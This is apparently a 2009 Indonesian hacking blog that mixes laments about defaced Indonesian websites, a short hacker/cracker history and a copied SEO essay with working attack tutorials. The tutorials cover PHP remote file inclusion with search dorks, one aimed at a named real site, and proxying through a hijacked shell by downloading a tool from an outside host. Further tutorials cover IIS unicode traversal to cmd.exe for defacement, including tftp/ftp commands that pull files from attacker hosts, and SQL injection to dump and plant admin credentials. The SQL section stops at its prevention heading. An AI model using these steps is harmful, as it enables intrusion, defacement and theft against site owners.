..:: Hack1ng 1n Th3 w0rLd ::..

hufh...

2009-03-28T16:43:00.000-07:00

Kenapa masi ada saja WEBSITE Indonesia yang security nya sangad buruk..

apa kata DUNIA.. ???

kapan WEBSITE Indonesia maju ???

Kenapa masi bisa di tembus
oleh seorang HACKER ??

duuh jadii prihatin liad web - web Indonesia
di Deface.

>.<

2009-03-28T16:40:00.000-07:00

Salah Satu Kelalaian WEBSITE INDONESIA..?!

..::WHY::..

!!..Please Repire Your System..!!

Arti Hacker dan Cracker

2009-03-28T03:39:00.000-07:00

Hacker muncul pada awal tahun 1960-an diantara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka beroperasi dengan sejumlah komputer mainframe. Kata hacker pertama kali muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik dari yang telah dirancang bersama. Kemudian pada tahun 1983, analogi hacker semakin berkembang untuk menyebut seseorang yang memiliki obsesi untuk memahami dan menguasai sistem komputer. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee AS. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Salah seorang dari antara pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.

Kemudian pada perkembangan selanjutnya muncul kelompok lain yang menyebut-nyebut diri hacker, padahal bukan. Mereka ini (terutama para pria dewasa) yang mendapat kepuasan lewat membobol komputer dan mengakali telepon (phreaking). Hacker sejati menyebut orang-orang ini 'cracker' dan tidak suka bergaul dengan mereka. Hacker sejati memandang cracker sebagai orang malas, tidak
bertanggung jawab, dan tidak terlalu cerdas. Hacker sejati tidak setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah menjadi hacker.

Para hacker mengadakan pertemuan setiap setahun sekali yaitu diadakan setiap pertengahan bulan Juli di Las Vegas. Ajang pertemuan hacker terbesar di dunia tersebut dinamakan Def Con. Acara Def Con tersebut lebih kepada ajang pertukaran informasi dan teknologi yang berkaitan dengan aktivitas hacking.

White Hat VS Black Hat

2009-03-28T03:33:00.000-07:00

Let’s face it: as long as there is a logical-sounding, convenient (useful) label floating around, it will get used and mis-used. That is the story of “Black Hat SEO” and “White Hat SEO”. They are poor quality labels, poorly-defined (in practice), yet so easily “understood” and so convenient that they persist… year after year.

Personally I believe that these labels are good for Google, and bad for SEO practitioners. I believe that by labeling SEO as “black” or “white”, Google gains an opportunity to influence the popular perception of SEO in it’s favor, where otherwise it would not have such an opportunity. Of course Google has used this to its advantage many times (such as the times it has cautioned web site owners not to trust SEOs, because they may employ Black Hat tactics…F.U.D.). As I have said before, there is only one color of SEO worthy of effort, and that’s Green SEO.
So while it is unfortunate that we have to accept these labels, we do have to accept them because our clients think they understand them. Therefore, it is also essential that we properly define them.

That’s really quite easy to do, especially when you start with the definition of “Black Hat” SEO:

Black Hat : techniques or tactics which have been defined by Google as in violation of the Google “Quality Guidelines” (see “Quality Guidelines, which outline some of the illicit practices that may lead to a site being removed entirely from the Google index”) . The Black Hat label applies to those methods specifically mentioned n the “Guidelines”, other methods and/or tactics or circumstances mentioned byMatt Cutts in his blog, in Matt’s comments on others’ blogs, or just about anywhere anyone from Google says anything that strongly suggests Google took action against a site for some specific reason. Black Hat SEOs know what they are doing is defined as BAD, and do it anyway for specific reasons (not usually including “get banned”). I like to think of Black Hat SEOs as opportunists. They see an opportunity to gain, and take it, managing the associated risk. Please don’t confuse ignorant SEOs with Black Hat SEOs… the ignorant ones are those who execute on Black Hat (evil) tactics without managing the risks (either out of ignorance or folly doesn’t matter to me here).

White Hat: techniques or tactics which can be defended as NOT being contrary to the spirit of Google’s expressed quality desires, by citing Google’s own published guidelines, Matt Cutts’ blog posts, or comments posted in other places, or just about any other Google communication. I like to refer to White Hat SEOs as “conservatives” of the SEO world… where things are viewed as BLACK or WHITE (GOOD or BAD), and the letter of the Google god is taken verbatim as TRUTH. Yes, there is a bit of a timeline problem with that approach (if Matt said it was bad in 2002, is it still bad?) but that’s just the tip of the White Hat iceburg.

Grey Hat (or Gray Hat): Since the color gray is between black and white, logically Grey Hat SEO sounds like a label for the middle ground. But it’s not. Because White is pure white and grey is a shade of black, we have confusion. Some say Grey Hat is NOT White Hat and is just a shade of Black Hat. So let’s step away from the coor wheel and define Grey Hat as the practice of tactics/techniques which remain ill-defined by all that published material coming out of Google, and for which reasonable people (not White Hat SEOs, mind you, but “reasonable people”) could disagree on how the tactics support or contrast with the “spirit” of Google’s published guidelines.

In Hom3 Badkiddies

2009-03-28T03:13:00.000-07:00

hufh,,,

malem - malem kerumah nya si bad,,!?

>.<

huh..

sudah jauh, gelap, ngeri, di desa lagiii :p

heheeheee..

walaupun gelap dan sebagi na..

tapi lumayan jugag , bisa internet gratis pake MAC .... :P

banyak kejadian janggal saat malam harii.. <--- ehM.. hayO ada apaa yaa .. :P
wkwkkwkwkwkw.... :P

Thx f0r : Badkiddies - Om Bernand - Pak.Hanjian and Bonsterfly.. :P

..:: Deface ::..

2009-03-27T13:55:00.000-07:00

aya ingin berbagi pengalaman tentang nge-Deface dan berbagai command command yang bermanfaat bagi kita didalam nge-Deface..

Oke deh ga perlu berpanjang lebar apa itu DEFACE.... wong kita cuman mempelajari bagaimana caranya masuk ke dalam web seseorang yang didalamnya terdapat BUG atau kesalahan kesalahan yang terdapat pada Script atau Link nya..

Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..

cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
fined = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk
tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.

Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :

- Oneadmin

Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:.net
nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=

Contoh :
http://target.com/oneadmin/config.php?path[docroot]=http://geocities.com/hackerbalinese/hackbalinese.txt?&cmd=uname -a;cd;pwd;ls –al

- PnPhpBB2

Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki...

nah sekarang saya kasi contoh pathnya … http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

Contoh :
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/hackerbalinese/hackbalinese.txt?&cmd=uname%20-a;cd;pwd

- Support Ticket

Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki...
nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=

Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=http://geocities.com/hackerbalinese/hackbalinese.txt?&cmd=uname -a;cd;pwd;ls –al

Hehehe Lumayan banyak kan ? Nah selamat mencobanya..
Neh aku kasi beberapa web yang telah berhasil saya Deface..

Membuat Proxy Dari Shell

2009-03-17T04:56:00.001-07:00

kamu punya shell..??? tapi bingung mo diapain?? aku punya jawabannya… ayo kita buat proxy sendiri menggunakan shell hasil inject-an kita… hehhee…

ok daripada banyak bacot.. kita mulai tutorialnya…

INGAT… ini hanya buat kamu yang dah punya shell hasil inject-an, dan shell itu menggunakan LINUX sebagai Operating F*ckin system-nya

1. cari folder yang permision 777 (drwxrrwxrwx) dengan menggunakan command

“find / - tipe d -perm 777”

kalo dah ketemu… masuk ke folder tersebut…

2. download file proxy.tgz ini dengan menggunakan command “wget http://h1.ripway.com/xshadow/proxy.tgz” atau

“lwp-download http://h1.ripway.com/xshadow/proxy.tgz“.

Kalo masih tetep gak bisa.. dengan terpaksa kamu harus dunlut file proxy.tgz trus upload ke shell inject-an kamu tadi… kalo dah ter download atau upload file proxy.tgz-nya… kamu boleh masuk ke no.3

3. extra’ file proxy dengan menggunakan command “tar -zvxf proxy.tgz” nanti akan menghasilkan folder “pro” pada folder yang 777 tadi…

4. masuk ke folder “pro” dengan menggunakan command “cd pro”

5. kemudian execute menggunakan command “./xh -s “/usr/local/apache/bin/httpd -DSSL””

6. execute sekali lagi menggunakan command “./prox -a -d -p1810” dimana angka pada -p1810 itu digunakan sebagai port… terserah kamu buat port brapa.. yang penting jangan menggunakan kepala angka 0 ex: 0932 atau apalah.. kalo bisa kamu lihat hasil nomor hari ini di www.totobet.net hari ini… heuheuehue

7 sukses

nah untuk menggunakan proxy tersebut… dimana dns website itu sebagai nomor proxy… dan nomor togel yang di -p1810 ituitu adalah nomor port…

DEFACE FROM CMD.EXE

2009-03-14T10:26:00.000-07:00

1. Kita Harus menentukan WebSite Target/ Sasaran Kita : www.target.loe contoh-->> www.target.com

2. Login
Ini Merupakan Directory yang Ada Di Web Site Tersebut
Directory Ini Di Configurasi Dengan Script tertentu Supayafile dalam Web tersebut Berhubungan Jika terjadi bug pada script nya maka kita bisa bembus web ini
ada beberapa contoh login diantaranya :
a)/_vti_bin
b)/_vti_cnf
c)/cgi-bin
d)/scripts
e)/msadc

3. Unicode --->> merupakan code yang dapat membaca script configurasi website tersebut code ini yang dapat membaca bug cgi nya
hasil codingnya seperti bisa 1-3 x pengulangan tergantung target yang akan kita hackinng
a) ..%c1%1c..
b) ..%c0%9v..
c) ..%c0%af..
d) ..%c0%qf..
e) ..%c1%8s..
f) ..%e0%80%af..
g) ..%c1%9c..
h) ..%c1%pc..

4. OS target -->>ini Menyatakan Sertificate Web Os kita WinNT dan Win98
0xB5 ISO 8859-1
0xC5 ISO 8859-1
0xEA CP437
0x2140 JIS X 0208
0x22 ISO 8859-1

5. Cara Kerja
Secara Garis Besar deface Ini dilakukan Dengan tiga Cara yaitu :
A.) Deface WebSite Perintah Echo

a.)Secara umum : http://target/login/unicode/os/system/c+dir atau http://www.target.com/login/unicode/os/system/c+dir

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:

Jika terdapat Bug Maka Pada title brower kita ada kata CGi Error Maka Kita telah menembus web site itu
Maka Yang terlihat pada brower kita adalah list yang berupa isi hardisk webserver tersebut sama halnya
command dir yang kita lakukan di Dos Prompt
Directory of c:
10/05/2001 19:56 Programs Files
10/05/2001 19:56 Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54 AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm

b.)Setelah berhasil liat List Hardisk Kita Harus cari Path_Translade web nya dengan menggunakan command /c+dir+c: di ubah menjadi /c+set

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: menjadi http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+set /c+dir+c: di ubah menjadi /c+set

maka Akan keluar CGI error yang isinya menyatakan Configurasi Batch Sytem WebServer tersebut. Keluar Macam - Macam, Yang Perlu dilihat cuma:
Path_Translated=d:\inetpub\wwwroot

c.) Langkah Selanjutnya Adalah Copy file cmd.exe dengan nama baru cmd1.exe atau nama anda contoh Jangkrik.exe dengan mengganti

/c+dir+c: menjadi /c+copy+c:

lalu ditambahkan dengan : winntsystem32cmd.exe+c:jangkrik.exe

sehingga kita dapatkan :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:jangkrik.exe

sekarang kamu bisa liat file cmd1.exe udah ada di direktori :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:
Tujuan Ini Sebenarnya untuk menyingkat command pada addres ie kita

d.) Cari halaman index ke www.target.com/blah.ida
Kadang-kadang ekstensi .ida yang tidak diketahui akan merespon lokal path.
Kalo trik .ida tidak bekerja, coba gunakan direktori InetPub :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:inetpub
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:inetpubwwwroot
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:inetpubwwwrootindex.htm

sebenarnya langkah ini tidak perlu tapi untuk jaga -jaga kan ngak papa
dengan langkah b.) tadi sebenarnya kita sudah tau dimana letah index.htm nya atau dengan kata lain folder webnya

e.) kalau lo merasa dirinya hacker backup dulu halaman depan web nya, karena hacker kerjanya bukan menghancurkan tapi memperingatkan
hanya orang - orang amatiran atau katalain orang yang berjiwa vandalis yang kerja merusak tanpa backup index.htm nya, jika tidak kita menulisnya dengan nama file baru dengan cara :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+copy+c:inetpubwwwrootindex.htm+c:inetpubwwwrooti ndex.htm.bak

f.) Baru Kita deface atau echo Halaman Depannya dengan command dibawah ini :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+echo+You%20Were%20Hacked+>+c:inetpubwwwrootindex.htm
untuk tidak merusak web nya kita tulis dengan nama file baru
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+echo+You%20Were%20Hacked+>+c:inetpubwwwrootjangkrik.htm

/c+echo+You%20Were%20Hacked+>+c: >>> adalah untuk menuliskan kata-kata You Were Hacked pada

c:inetpubwwwrootindex.htm file yang ditulis atau c:inetpubwwwrootjangkrik.htm file yang ditulis

Untuk Anda yang telah Paham Bahasa Html Kalau pengen Hasil Defacenya keren Gunakan command ini
/c+echo"
This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
"+>+c:inepubwwwrootindex.htm
/c+echo"
This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
"+>+c:inepubwwwrootjangkrik.htm
keterangan :
%3d adalah pernyataan tanda =
%22 adalah Pernyataan tanda "
%23 adalah pernyataan tanda #
Untuk Anda Yang Paham Html Anda Bisa NGapain aja Tuh Deface Web Anda. Biar Bagus hack deface nya di input pakai Flash juga

g.) Langkah terkahir untuk liat hasilnya Membaca file yang lain dengan menggunakan perintah 'type' :

http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+type+c:inetpubwwwrootindex.htm
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+type+c:inetpubwwwrootjangkrik.htm
Atau liat Langsung aja http://www.target.com/ atau www.target.com/jangkrik.htm

Jika dikau menemukan webserver ini dalam penulisannya accses denied ( penolakan penulisan ) Maka langkah kedua yaitu dengan cara tftp:

B.) Deface WebSite Dengan Cara tftp

Deface nya dilakukan dengan meng-upload file lewat TFTP32
Untuk Mendukung Tftp kita download dulu softwarenya http://www.download.com ketik keyword nya TFTP32
Dikau Main Di Kompi diserver (sebab di user pasti takkan bisa).
Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.
mari kita mulai meng-uploadnyah perintahnya sesuai langkah berikut ini :

a.) Kita Lakukan Langkah a.) (A.)pada deface dengan echo untuk mencari vulnernnya atau bug cginya
sehingga kita mendapatkan holenya atau script nya http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/
langkah selanjutnya yaitu uploadnya lagi. Namun Sebelumnya kita Dah siapkan File htm/html halaman web defacenya ( berkreasi lah dikau disini )
Setelah semua siap baru upload dengan command http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe up-load)+ C:InetPubwwwrootmain.html

b.)Kita liat lagi apa yg terjadi di IE kita.

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :

Waa..waaa .selamat dikau telah berhasil meng-upload file dikau memakai sofwer TFTP32 tadee silahkan buka web site target tadi

Kekurangannyah dalam meng-upload file lewat TFTP32 terkadang suatu server (web site) tidak mau menerima up-load file kita tadee. Jikalau itu terjadi maka gunakanlah cara pertama di atas tadee.

C.) Dengan Cara Ftp Dengan Web Kita Yang Telah Kita Isi Dengan Bahan Deface Kita

Langkah Pertama adalah kita bikin dulu domain gratisan di web server gratisan. di web itu kita drop halaman web deface kita atau backdoor,virus atau program penghancur lainnya

selanjutnya kita lakukan Sama dengan Cara langkah a.)(A.) setelah dikau tau hole cgi bugnya atau unicodennya maka dikau lakukan langkah berikut ini:

a.) Setelah kita menemukan vulnernya
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:
Directory of c:
10/05/2001 19:56
Programs Files
10/05/2001 19:56
Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54
AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm

b.) Lalu kita lakukan langkah copy sesuai di langkah b.)(A.) ---->>tujuan nya memendekkan command unicode nya

c.) Lalu Kita Liat +set nya untuk melihat patch translade nya
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+set

Kira Nya path nya di c:inetpubwwwroot

d.)Langkah Selanjutnya Yaitu kita membuat script ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+close+>>+c:inetpubwwwrootjangkrik.ftp

Setelah Scrip jangkrik.ftp selesai di liat lagi script nya apa benar
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+type+c:inetpubwwwrootjangkrik.ftp

Setelah selesai script tuh kita jalan kan lagi script nya:
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+ftp+-s:c:inetpubwwwrootjangkrik.ftp

buka ie satulagi untuk liat file nya dah smapai belum
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:inetpubwwwroot
Kalau dah terkirim selamat dah

Keterangan nya :
Pada scrip jangkrik.ftp itu kita muatkan hal ini sebenarnya
open geocities.com --->>> scriptnya --->> +echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
jangkrik --->> user name --->>> scriptnya -->> +echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
anuamakang --->>> password --->>> scriptnya -->> +echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
lcd c:inetpubwwwroot --->>> folder tujuan --->>> scriptnya -->>>+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
ascii --->>> bentuk file --->>> scripnya --->>> +echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
get jangkrik.htm ---->>> command tranfer file --->>> +echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
close --->> perintah dc ke web server ---->>> scripnya --->>> +echo+close+>>+c:inetpubwwwrootjangkrik.ftp

hehehe Dengan cara ini anda dapat drop apa saja keweb orang tuh baik itu web deface, backdror, ircserver, bot, bnc, psybnc, trojan and virus deh..........

untuk mengirim file yang binary kode bentuk file dari asci di ubah menjadi binary.

AbouT SQL - INJECTION WALKTROUGH

2009-03-14T10:22:00.000-07:00

1.1 What is SQL Injection?
It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.

1.2 What do you need?
Any web browser.

2.0 What you should look for?
Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:

Everything between the have potential parameters that might be useful (exploit wise).

2.1 What if you can't find any page that takes input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like:

http://duck/index.asp?id=10

3.0 How do you test if it is vulnerable?
Start with a single quote trick. Input something like:

hi' or 1=1--

Into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--

If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:

If luck is on your side, you will get login without any login name or password.

3.1 But why ' or 1=1--?
Let us look at another example why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:

http://duck/index.asp?category=food

In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):

v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)

As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:

SELECT * FROM product WHERE PCategory='food'

The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'.

Now, assume that we change the URL into something like this:

http://duck/index.asp?category=food' or 1=1--

Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have:

SELECT * FROM product WHERE PCategory='food' or 1=1--'

The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. A double dash "--" tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote ('). Sometimes, it may be possible to replace double dash with single hash "#".

However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try

' or 'a'='a

The SQL query will now become:

SELECT * FROM product WHERE PCategory='food' or 'a'='a'

It should return the same result.

Depending on the actual SQL query, you may have to try some of these possibilities:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

4.0 How do I get remote execution with SQL injection?
Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

Try using double quote (") if single quote (') is not working.

The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:

#tcpdump icmp

If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.

5.0 How to get output of my SQL query?
It is possible to use sp_makewebtask to write your query into an HTML:

'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

But the target IP must folder "share" sharing for Everyone.

6.0 How to get data from the database using ODBC error message
We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:

http://duck/index.asp?id=10

We will try to UNION the integer '10' with another string from the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-

This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5

The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".

To get the next table name, we can use the following query:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

We also can search for data using LIKE keyword:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5

The matching patent, '%25login%25' will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".

6.1 How to mine all column names of a table?
We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5

Now that we have the first column name, we can use NOT IN () to get the next column name:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5

When we continue further, we obtained the rest of the column name, i.e. "password", "details". We know this when we get the following error message:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5

6.2 How to retrieve any data we want?
Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database.

Now, let's get the first login_name from the "admin_login" table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5

We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5

We can now login as "neo" with his password "m4trix".

6.3 How to get numeric string value?
There is limitation with the technique describe above. We cannot get any error message if we are trying to convert text that consists of valid number (character between 0-9 only). Let say we are trying to get password of "trinity" which is "31173":

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--

We will probably get a "Page Not Found" error. The reason being, the password "31173" will be converted into a number, before UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL server will not throw ODBC error message, and thus, we will not be able to retrieve any numeric entry.

To solve this problem, we can append the numeric string with some alphabets to make sure the conversion fail. Let us try this query instead:

http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--

We simply use a plus sign (+) to append the password with any text we want. (ASSCII code for '+' = 0x2b). We will append '(space)morpheus' into the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function, trying to convert '31173 morpheus' into an integer, SQL Server will throw out ODBC error message:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5

Now, you can even login as 'trinity' with the password '31173'.

7.0 How to update/insert data into the database?
When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo":

http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--

To INSERT a new record into the database:

http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--

We can now login as "neo2" with the password of "newpas5".

8.0 How to avoid SQL Injection?
